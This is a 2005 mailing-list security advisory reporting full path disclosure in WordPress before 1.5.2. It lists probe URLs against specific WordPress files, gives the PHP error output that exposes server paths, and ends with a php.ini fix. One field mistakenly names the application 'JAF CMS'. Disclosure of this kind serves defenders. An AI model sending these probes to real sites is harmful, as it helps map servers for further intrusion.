Network Security: Detailed info on [ECHO_ADV_24$2005] Full path disclosure on WordPress

Subject:	[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2
Date:	20 Dec 2005 11:01:23 -0000

ECHO.OR.ID
ECHO_ADV_24$2005

---------------------------------------------------------------------------
[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2
---------------------------------------------------------------------------

Author: Dedi Dwianto
Date: Dec, 20th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv24-theday-2005.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : JAF CMS
version: < 1.5.2
URL  : http://wordpress.org/
Description :

WordPress is a very popular personal publishing platform aka blog
software, and is used by everyone from celebrities, to government
officials, to non technical average joe's. 
---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Full path disclosure:

   A remote user can access the file directly to cause the system to display  
   an error message that indicates the installation path. The resulting error 
   message will disclose potentially sensitive installation path information 
   to the remote attacker.

  * http://victim/[WP Folder]/wp-includes/vars.php?PHP_SELF%20=dudul

  POC :
  
  http://localhost/blog/wp-includes/vars.php?PHP_SELF%20=dudul
  
  Fatal error: Call to undefined function: get_settings() in 
  /var/www/html/blog/wp-includes/vars.php on line 106

  
  * http://victim/[WP Folder]/wp-content/plugins/hello.php

  POC :

  http://localhost/blog/wp-content/plugins/hello.php

  Fatal error: Call to undefined function: wptexturize() in 
  /var/www/html/blog/wp-content/plugins/hello.php on line 44


  * http://victim/[WP Folder]/wp-admin/menu-header.php?self=dudul

  POC :
 
  http://localhost/blog/wp-admin/menu-header.php?self=dudul

  PHP Fatal error: Call to undefined function: get_admin_page_parent() in
  /var/www/html/blog/wp-admin/menu-header.php on line 6 
  Fatal error: Call to undefined function: get_admin_page_parent() in 
  /var/www/html/blog/wp-admin/menu-header.php on line 6


  * http://victim/[WP Folder]/wp-admin/upgrade-functions.php

  POC :

  http://localhost/[WP Folder]/wp-admin/upgrade-functions.php
  
  Warning: main(ABSPATH/wp-admin/admin-functions.php): failed to open stream: 
No such file or directory 
  in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
  PHP Fatal error: main(): Failed opening required 
'ABSPATH/wp-admin/admin-functions.php' 
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in 
/var/www/html/blog/wp-admin/upgrade-functions.php on line 3 
  Fatal error: main(): Failed opening required 
'ABSPATH/wp-admin/admin-functions.php' 
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in 
/var/www/html/blog/wp-admin/upgrade-functions.php on line 3


  * http://victim/[WP FOlder]/wp-admin/edit-form.php

  POC :
   
  http://localhost/blog/wp-admin/edit-form.php

  PHP Fatal error: Call to undefined function: _e() in 
/var/www/html/blog/wp-admin/edit-form.php on line 3 
  Fatal error: Call to undefined function: _e() in 
/var/www/html/blog/wp-admin/edit-form.php on line 3

  * http://victim/[WP FOlder]/wp-settings.php

  
  POC : http://localhost/blog/wp-settings.php

  Warning: main(ABSPATHwp-includes/wp-db.php): failed to open stream: No such 
file or directory in
  /var/www/html/blog/wp-settings.php on line 59
  PHP Fatal error: main(): Failed opening required 
'ABSPATHwp-includes/wp-db.php'
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in 
/var/www/html/blog/wp-settings.php on line 59 
  Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php' 
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in 
/var/www/html/blog/wp-settings.php on line 59


  * http://victim/[WP FOlder]/wp-admin/edit-form-comment.php

  POC :
  
  http://localhost/blog/wp-admin/edit-form-comment.php

  Fatal error: Call to undefined function: __() in 
/var/www/html/blog/wp-admin/edit-form-comment.php on line 2


B. Fix

  For User and do not know how to fix the script , change php.ini file setting 
  then turn on log_errors , and turn off display_error

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com 
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     the_day || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

<Prev in Thread]	Current Thread	[Next in Thread>
[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2, the_day [ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2, the_day@echo.or.id <=

Previous by Date:	Tolva PHP website system Remote File Include, beford
Next by Date:	[Security-Advisories@acs-inc.com: [Full-disclosure] [ACSSEC-2005-11-25-0x1] VMWare Workstation 5.5.0 <= build-18007 G SX Server Variants And Others], Andrew Griffiths
Previous by Thread:	[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2, the_day
Next by Thread:	Re: Symantec Antivirus Library Remote Heap Overflows, ltr
Indexes:	[Date] [Thread] [Top] [All Lists]